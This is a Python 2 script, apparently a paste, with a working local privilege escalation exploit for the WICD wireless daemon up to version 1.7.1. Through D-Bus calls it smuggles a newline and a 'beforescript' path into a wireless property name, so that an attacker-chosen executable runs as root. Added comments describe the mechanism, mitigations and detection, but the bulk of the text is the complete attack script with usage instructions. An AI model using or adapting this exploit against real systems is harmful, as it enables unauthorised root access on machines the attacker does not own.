Topol

WICD Local Privilege Escalation Exploit

Aug 29th, 2012
  1. #!/usr/bin/python
  2. #wicd <= 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student
  3. #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
  4. import sys
  5. import os
  6. import time
  7. import getopt
  8.  
# The D-Bus helper ships with WICD itself, so a failed import is reported as
# "WICD not installed". The bare except also hides any other failure raised
# while importing, and the script exits with status 0 even on this error path.
try:
    from wicd import dbusmanager
except:
    print "[!] WICD Error: libraries are not available. Is WICD installed?"
    sys.exit(0)
  11.  
class Error(Exception):
    """Script-level failure carrying one payload (normally a message string).

    The payload is stored on ``errorStr``; ``str()`` of the exception is the
    ``repr`` of that payload, so a string message comes back quoted.
    """

    def __init__(self, error):
        # Exception.__init__ is deliberately not called, as in the original.
        self.errorStr = error

    def __str__(self):
        return "%r" % (self.errorStr,)
  18.      
  19.  
class Wicd():
    """Client-side handle on the WICD daemon's D-Bus interfaces.

    Construction connects through ``dbusmanager`` and keeps the "wireless"
    and "daemon" interface objects plus the string returned by the daemon's
    ``Hello()`` call.
    """

    wireless = None
    daemon = None
    versionString = None

    def __init__(self):
        # Any failure while connecting or looking up the interfaces is
        # reported as "Daemon is not running"; the bare except discards the
        # real cause.
        try:
            dbusmanager.connect_to_dbus()
            ifaces = dbusmanager.get_dbus_ifaces()
            self.wireless = ifaces["wireless"]
            self.daemon = ifaces["daemon"]
        except:
            raise Error("Daemon is not running")
        # Hello() is called outside the try block, so its errors propagate
        # unchanged.
        self.versionString = self.daemon.Hello()

    def versionLessThan(self, version):
        """Return True when the daemon version is at or below *version*.

        The dotted version string is collapsed to its digits ("1.7.0" ->
        170) and compared as an integer, so the check is inclusive despite
        the method name and assumes a purely numeric dotted version.
        """
        collapsed = "".join(self.versionString.split("."))
        return int(collapsed) <= version
  39.      
  40.  
class Exploit():
    """Proof-of-concept for the WICD local privilege escalation named in the file header.

    Defender reading: the only untrusted-looking input the daemon receives here
    is a wireless *property name* that embeds " = ", a path and a newline.
    Presumably the daemon stores that name unvalidated in its saved network
    settings, so the text before the newline is later read back as a separate
    "beforescript" entry and run with the daemon's privileges (the usage text
    says "executable to run as root") -- confirm against the daemon source.

    Mitigation on the daemon side: reject property names and values containing
    newlines or "=", and do not let unprivileged D-Bus callers set script
    properties. For detection, review the daemon's saved wireless settings for
    script entries nobody configured and for keys that are not known
    property names.
    """

    def __init__(self, wicd, scriptPath):
        # wicd: a connected Wicd instance; scriptPath: the value of --scriptPath.
        self.wicd = wicd
        self.scriptPath = scriptPath

    def getNets(self):
        """Scan until at least one network is reported, then yield each network index.

        NOTE(review): the while loop has no retry limit, so it never returns
        if the daemon keeps reporting zero networks.
        """
        self.wicd.wireless.Scan(True)
        nets = self.wicd.wireless.GetNumberOfNetworks()
        while nets < 1:
            self.wicd.wireless.Scan(True)
            nets = self.wicd.wireless.GetNumberOfNetworks()
        for net in range(nets):
            yield net

    def exploit(self):
        """Run the D-Bus call sequence against network index 0; return True or raise Error.

        The order of the daemon calls below is significant, which is why this
        block is documented rather than restructured.
        """

        for net in self.getNets(): pass # Priming scan.

        # The property *name* (second argument) is the crafted string; the
        # value is just "true". A daemon that validated names against a fixed
        # list, or refused newlines, would reject this call.
        try:
            self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")

        # Same crafted name, now asked to be saved for network 0.
        # NOTE(review): the message below still names SetWirelessProperty()
        # although the failing call here is SaveWirelessNetworkProperty(); the
        # bare except also hides the daemon's actual error.
        try:
            self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
        except:
            raise Error("Unable to exploit (SetWirelessProperty() failed.)")

        # Remember network 0 by a stable property so it can be found again
        # after the re-scan, when indices may have changed.
        propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property
        vulnIdentifier  = self.wicd.wireless.GetWirelessProperty(0, propertyKey)

        # TODO: Does this need a try construct?
        # Presumably makes the daemon re-read its saved settings -- confirm.
        self.wicd.wireless.ReloadConfig()

        for net in self.getNets(): # Implicit, but required re-scan.
            if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
                # Connecting is the last step issued; True only means the
                # connect request was sent without an exception.
                self.wicd.wireless.ConnectWireless(net)
                return True
        raise Error("Unable to exploit (Lost the network we were using)")
  81.      
  82.  
def usage():
    """Print the command-line help text, one line per entry, to stdout."""
    helpLines = (
        "[!] Usage:",
        " ( -h, --help ):",
        "     Print this message.",
        " ( --scriptPath= ): Required, executable to run as root.",
        "     --scriptPath=/some/path/to/executable.sh",
    )
    for helpLine in helpLines:
        print helpLine
  89.  
def main():
    """Parse the command line, connect to the WICD daemon and run Exploit.

    Accepts -h/--help and the required --scriptPath=PATH. Every error path
    prints a "[!]" message and exits with status 0, so callers cannot tell
    failure from success by exit code. A daemon version above 1.7.1 only
    produces a warning; the run continues regardless.
    """
    print "[$] WICD =< 1.7.0Day"
    try:
        parsed, _args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
    except getopt.GetoptError, err:
        # getopt's message reads like "option -a not recognized".
        print '[!] Parameter error:' + str(err)
        usage()
        sys.exit(0)

    scriptPath = None

    for flag, value in parsed:
        if flag == "--scriptPath":
            scriptPath = value
            continue
        # Anything else ends the run: help prints usage only, an unexpected
        # option (not expected to be reachable after getopt) prints an error
        # first.
        if flag not in ("-h", "--help"):
            print "[!] Parameter error."
        usage()
        sys.exit(0)

    if not scriptPath:
        print "[!] Parameter error: scriptPath not set."
        usage()
        sys.exit(0)

    try:
        session = Wicd()
    except Error as error:
        print "[!] WICD Error: %s" % (error.errorStr)
        exit(0)
    print "[*] WICD Connection Initialized! (Version: %s)" % (session.versionString)

    # versionLessThan(171) is an inclusive check on the collapsed digits.
    if not session.versionLessThan(171):
        print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."

    runner = Exploit(session, scriptPath)

    print "[*] Attempting to exploit:"

    try:
        runner.exploit()
    except Error as error:
        print "[!] Exploit Error: %s" % (error.errorStr)
        exit(0)
    print "[*] Exploit appears to have worked."
  139.  
# Script entry point: run main() only when this file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()